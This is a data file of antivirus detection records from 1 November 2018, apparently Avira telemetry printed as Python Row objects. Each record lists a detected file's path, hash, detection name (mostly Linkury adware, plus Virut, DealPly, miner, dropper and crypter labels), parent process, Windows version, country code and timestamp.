  Row(detection=Row(filename='gspideypc.exe', filepath='F:\\اغاني\\العاب\\games\\الرجل العنكبوت\\gSpideyPC.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='9af631417530593a30073bc64a4dda6e2e3e310a92bd98fb948f398837a69e8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SuperCopier2\\SuperCopier2.exe', parentsize=955392, timestamp='2018-11-01T18:23:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msi7142.tmp', filepath='\\\\?\\C:\\Windows\\Installer\\MSI7142.tmp', filesize=3072000, name='Adware/DealPly.ME.22.#M1.#R1'), hash='9b61cf90b3b8cd80f89ae004b3862efce6b7c141aa8ddf2e5f5633396fd15d2f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msi7142.tmp', filepath='\\\\?\\C:\\Windows\\Installer\\MSI7142.tmp', filesize=3072000, name='Adware/DealPly.ME.22.#M1.#R1'), hash='9b61cf90b3b8cd80f89ae004b3862efce6b7c141aa8ddf2e5f5633396fd15d2f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9b7e664511f94132ef0a775ad486784e64fe409ceced654bb34d3e2fde6928e4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\9B7E664511F94132EF0A775AD486784E64FE409CECED654BB34D3E2FDE6928E4', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='9b7e664511f94132ef0a775ad486784e64fe409ceced654bb34d3e2fde6928e4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:38:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instgui.exe', filepath='D:\\documentos\\Downloads\\cj2600en32\\install\\x86\\InstGui.exe', filesize=3584000, name='W32/Stanit.#M1.#R1'), hash='9b7f2ade8c8f824d520b6905e47405c10c2c4a97fb9ab3916b719bd8f34cefed', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:57:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110450-d362b633', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e55647dd\\AVSCAN-20181101-110337-CD3CD6C6\\AVSCAN-20181101-110450-D362B633', filesize=1536000, name='TR/BitCoinMiner.fxkbh.#M1.#R1'), hash='9bb685774ab6d6bb03a67bb3b4217ee9bf2dbadea7d5d2eb1865121811584b3b', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:04:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00008b14', filepath='C:\\Windows\\Temp\\1a64367a-4a2e-48c9-b633-ef33c12e4522\\tmp0000023a\\tmp00008b14', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='9be09266d1dff546ca3ac72759750ffa23fda80e1ca22869be96209739f67cf4', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T10:15:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='feko_70_calculator.exe', filepath='\\\\?\\D:\\дрова\\Feko 7\\FEKO_70_Calculator.exe', filesize=1152000, name='HEUR/AGEN.1001554.#M1.#R1'), hash='9c3a98ae4d6e9690ae5c1079a4b85b7a6c522027f84748bd8d10ba4c86112918', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\towerpokermpp\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\towerpokermpp\\mppoker.exe', parentsize=1289976, timestamp='2018-11-01T17:13:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetwaypokerMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Microgaming\\Poker\\BetwaypokerMPP\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T19:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\grosvenorcasinompp\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\grosvenorcasinompp\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T18:26:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetwaypokerMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetwaypokerMPP\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T17:40:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-040702-0d374d5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a3a329b\\AVSCAN-20181101-040614-F0385F4B\\AVSCAN-20181101-040702-0D374D5D', filesize=256000, name='TR/Crypter.davcp.#M1.#R1'), hash='9cea3e29dd6c6eb886217a076c3a142667f24313e26e72cd57cb6fcc4415ec84', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:08:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mooncrypter.exe', filepath='C:\\Users\\X\\Desktop\\Crypt\\Crypter-master\\[VB.Net] ForcedHacking 2.0\\MyCrypter\\MyCrypter\\obj\\Debug\\MoonCrypter.exe', filesize=256000, name='TR/Crypter.davcp.#M1.#R1'), hash='9cea3e29dd6c6eb886217a076c3a142667f24313e26e72cd57cb6fcc4415ec84', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:FJRFUf9DU0eEE4d9.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:06:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='index.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Game Pack\\Slingo\\omdata\\images\\index.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='9d2c1006e6033bb90bb165b237449b40b891779a50a139ed821f17b530dd7a76', metadata=Row(cmdline='\\\\\\/R \\\\\\/RE', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=143250520, timestamp='2018-11-01T18:11:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D2CC39370B7C63899AA2B4E7AFDC77D21194E09B48CEAB0F1A975053EB8C3D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:26:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T18:38:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='h:\\autorun.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T08:08:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090908-c4811aff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49ddaa1c\\AVSCAN-20181101-090853-C0DAA557\\AVSCAN-20181101-090908-C4811AFF', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='g:\\autorun.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T07:17:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123955-245fc43d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123933-11EC21E3\\AVSCAN-20181101-123955-245FC43D', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114012-6833f3db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20c0a6b1\\AVSCAN-20181101-113913-60849088\\AVSCAN-20181101-114012-6833F3DB', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:40:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123928-0d061469', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123906-FA1AA8E2\\AVSCAN-20181101-123928-0D061469', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122837-e1ec4faf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122814-CDCE5420\\AVSCAN-20181101-122837-E1EC4FAF', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:28:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130756-bec2f508', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-130734-AC9CA730\\AVSCAN-20181101-130756-BEC2F508', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:07:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122727-a5cb8efd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122649-85DEF2C5\\AVSCAN-20181101-122727-A5CB8EFD', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:27:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124851-ee11d974', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124832-DD7E965A\\AVSCAN-20181101-124851-EE11D974', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:48:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121915-019ed44b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121843-E68DAD8F\\AVSCAN-20181101-121915-019ED44B', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:19:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122237-ae4ca28d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122209-961C479E\\AVSCAN-20181101-122237-AE4CA28D', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122935-12c279a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122912-FF88AF9E\\AVSCAN-20181101-122935-12C279A0', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:29:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123832-dd99add2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123809-CA320C60\\AVSCAN-20181101-123832-DD99ADD2', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123606-60f2e0de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123546-4FF3A8CF\\AVSCAN-20181101-123606-60F2E0DE', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:36:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124632-76fb05c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124611-657C2641\\AVSCAN-20181101-124632-76FB05C9', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:46:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124603-5e923207', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124543-4D59DD7A\\AVSCAN-20181101-124603-5E923207', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:46:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124756-be788108', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124736-AD71273E\\AVSCAN-20181101-124756-BE788108', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:47:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122049-523c77c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121942-193EA754\\AVSCAN-20181101-122049-523C77C2', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:20:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123126-71d2531b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123105-5F8692CC\\AVSCAN-20181101-123126-71D2531B', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:31:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131055-57a4bd6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-131024-3D65AE15\\AVSCAN-20181101-131055-57A4BD6A', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:10:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124728-a69fdf40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124708-956FA8D1\\AVSCAN-20181101-124728-A69FDF40', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:47:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121437-151b845e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121404-F8BFF8C1\\AVSCAN-20181101-121437-151B845E', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123318-d19d5297', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123257-BFABBEE0\\AVSCAN-20181101-123318-D19D5297', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121816-cff0c716', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121735-AC4E63E8\\AVSCAN-20181101-121816-CFF0C716', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:18:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122431-0f552d33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122401-F5F8F33C\\AVSCAN-20181101-122431-0F552D33', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:24:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131002-2a623287', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-130926-0C107F24\\AVSCAN-20181101-131002-2A623287', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:10:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122334-df632acb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122305-C664725D\\AVSCAN-20181101-122334-DF632ACB', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:23:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130903-f85bd481', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-130832-DDA5827D\\AVSCAN-20181101-130903-F85BD481', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:09:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123347-e9e55ea3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123325-D7AC8A97\\AVSCAN-20181101-123347-E9E55EA3', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125557-59c13640', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-125537-48996B9B\\AVSCAN-20181101-125557-59C13640', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:55:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123223-a24d462b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123201-8F9BD7B1\\AVSCAN-20181101-123223-A24D462B', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124244-b47afbc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124222-A204443D\\AVSCAN-20181101-124244-B47AFBC1', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:42:45Z'), dt=datetime.date(2018, 11, 1)),
